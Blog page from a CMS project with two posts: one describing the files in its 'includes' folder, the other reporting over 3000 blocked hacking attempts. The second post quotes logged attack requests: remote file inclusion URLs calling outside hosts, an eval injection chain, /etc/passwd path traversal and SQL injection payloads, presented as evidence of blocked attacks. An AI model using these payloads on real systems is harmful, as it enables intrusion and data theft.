Do It Yourself CMS » Blog »


Learning the structure of DiY-CMS folders and file - Part 3

  By: admin   tags Date Added: Tuesday 09-11-2010 05:25 am

This is the third post that is directed to the developers more than the end user. In this post I will talk about the files in the “includes” folder in the root DiY-CMS directory. Knowing the task of each file will assist the developer to understand the architecture of DiY-CMS and data flow as well.

[attachment:1]



Includes folder contains the files responsible for the main tasks to run DiY-CMS and control the different aspect of the CMS.

Here is the list of folders and files:
PHPMailer folder: This folder contains the folders and file of popular mail program PHPMailer. It is the standard program in DiY-CMS to send emails for notifications or other uses.

bbcode.class.php: This file contains the class that handles bbcode format.

blocks.class.php: This file handles the arrangement of blocks (menus) in DiY-CMS view.

date_conversion.class.php: handles date conversion in DiY-CMS. It converts Gregorian date to Hijri (Islamic lunar) date and vice-versa.

email.class.php: This class utilises the functions of PHPMailer and group in one class to ease its use.

files.class.php: This class handles files read and write functions.

form.class.php: This file contains the functions needed to produce a form with different fields, such as creating an input field or textarea.

general.functions.php: This file contains general functions like functions handling page header, page footer, errors or message display.

hooks.functions.php: This file handles hooks management in DiY-CMS. You can use it to place a hook in a certain place in the module or plug-in you develop. Alternatively, you can use it to hook your functions to the built-in hooks in DiY-CMS. (I will explain how hooks work in detail in a future post).

keyword_generator.class.php: This class is used to generate keyword on the fly for posts in DiY-CMS. It increases posts’ friendliness to search-engine.

login.class.php: This file controls users’ authentication in DiY-CMS.

module.class.php: This file is responsible for module management. It checks for module’s status, loads its templates, load its settings and run the module.

mysql.class.php: This file contains the necessary functions that manage database connection, querying, database error handling.

plugins.class.php: This file handles plug-in management. It loads all the active plug-ins, load settings, load permissions and then run plug-ins.

post.functions.php: This file contains post-related functions. They include post sanitisation, preventing sql injections, check required fields and other functions.

protection.php: This file mainly prevents XSS attacks on DiY-CMS.

session.class.php: This class handles sessions.

spam.class.php: This class prevent post spamming in DiY-CMS, by checking IP address and time intervals between two consecutive posts of the same user.

templae.class.php: This class handles theme-related task. It check for the theme selected, load its templates, process their content and then output the page.

upload.class.php: This class handles file uplads in DiY-CMS. It can handle adding or editing multiple files at the same time.

I hope you liked this post, and looking forward to hear your comments and suggestions.


Tags: DiY-CMS-structure More details

Yeah! Preventing more than 3000 hacking attempts

  By: admin   tags Date Added: Wednesday 03-11-2010 09:27 am

Security is one of most important criteria in any script one would like to use. In this post I will talk about the security in DiY-CMS. DiY-CMS has the ability to prevent and record most hacking attempts.
Since April 11th http://www.diy-cms.com has prevented more than 3000 hacking attempts in both the English and the Arabic sections. Bear in mind that these are only the recorded attempts, SQL injection through forms, for example, are prevented but not recorded for number of reasons.

Attempts example:
Several methods were used to hack into the DiY-CMS, they include remote file inclusion, sql injection and attempt to access root folders and files.
Here are few examples:

Remote file inclusion (I replaced original site names with SITE-NAME):

/mod.php?mod=http://www. SITE-NAME.com.mx/admin/xroot.txt?
/?path=http://stul. SITE-NAME.cz/img/.jancuk/injek.txt??

/mod.php?mod=download&modfile=view_file&downid=1%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://nic. SITE-NAME.edu.cn/media/j1.txt???

/index.php//openi-admin/base/fileloader.php?config[openi_dir]=http://SITE-NAME.co.kr/poll/aipi/id.txt??

/index.php//cms/system/openengine.php?oe_classpath=http://SITE-NAME.org/Scripts/bogel/id1.txt????

/mod.php?mod=http://SITE-NAME.com/admin/images/index.txt?


Accessing root files and folders:
//index.php?option=com_myblog&Itemid=12&task=../../../../../../../../../../../../../../../../etc/passwd%00

/mod.php?mod=../../../../../../../../../../../../../../../etc/passwd%00
/cgi-bin/htdocs
/cgi-bin/logs
/cgi-bin/root

/mod.php?mod=http://jmbioanalises.com.br/Lims/images/g.txt?



SQL injection:
 /mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=pages"%20UNION%20ALL%20SELECT%20null,null,null,null,null,null,null,null,null,null,null,null,null,null%20where%20"x"="x

/mod.php?mod=27%20AND%20ascii(substring((SELECT%20distinct%20table_name%20FROM%20information_schema.tables%20Where%20table_schema=0x202020%20limit%2019,1),3,1))

/mod.php?mod=blog&modfile=index&page=2&start=10%20union%20select%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/*%20and%201=1


Geographic locations:
Attempts were initiated from more than 50 countries. Here is a graph of the top 6 countries where attempts originated from:

[attachment:1]



And here is a full list of countries where attempts originated from with the number of attempts:
Brazil => 52
United States => 52
Republic of Korea => 13
Saudi Arabia => 12
Germany => 7
United Kingdom => 7
Oman => 6
Morocco => 6
Algeria => 5
Palestinian Territory => 5
France => 5
Italy => 5
Turkey => 5
Indonesia => 4
Canada => 4
Netherlands => 4
Australia => 4
Russian Federation => 4
Belgium => 3
Kuwait => 3
Bulgaria => 3
Hungary => 3
Iraq => 2
Islamic Republic of Iran => 2
Czech Republic => 2
Poland => 2
Bahamas => 2
Austria => 2
Malaysia => 2
Japan => 2
Slovakia => 1
Ukraine => 1
South Africa => 1
Norway => 1
Belarus => 1
Argentina => 1
Azerbaijan => 1
Peru => 1
Bahrain => 1
Egypt => 1
Denmark => 1
Israel => 1
Thailand => 1
Syrian Arab Republic => 1
Latvia => 1
Martinique => 1
India => 1
Libyan Arab Jamahiriya => 1
Europe => 1
Mexico => 1
Greece => 1
Tunisia => 1


I hope that this post explains how powerful DiY-CMS when it comes to security and preventing hacking attempts, and I will always add more security measures to it.

If you want to check the types of hacking attempts your site is getting you can check “html/bugs.txt” file for the list of all hacking attempts.


Tags: prevent-hacking- More details

Pages
 1 
2 3 > »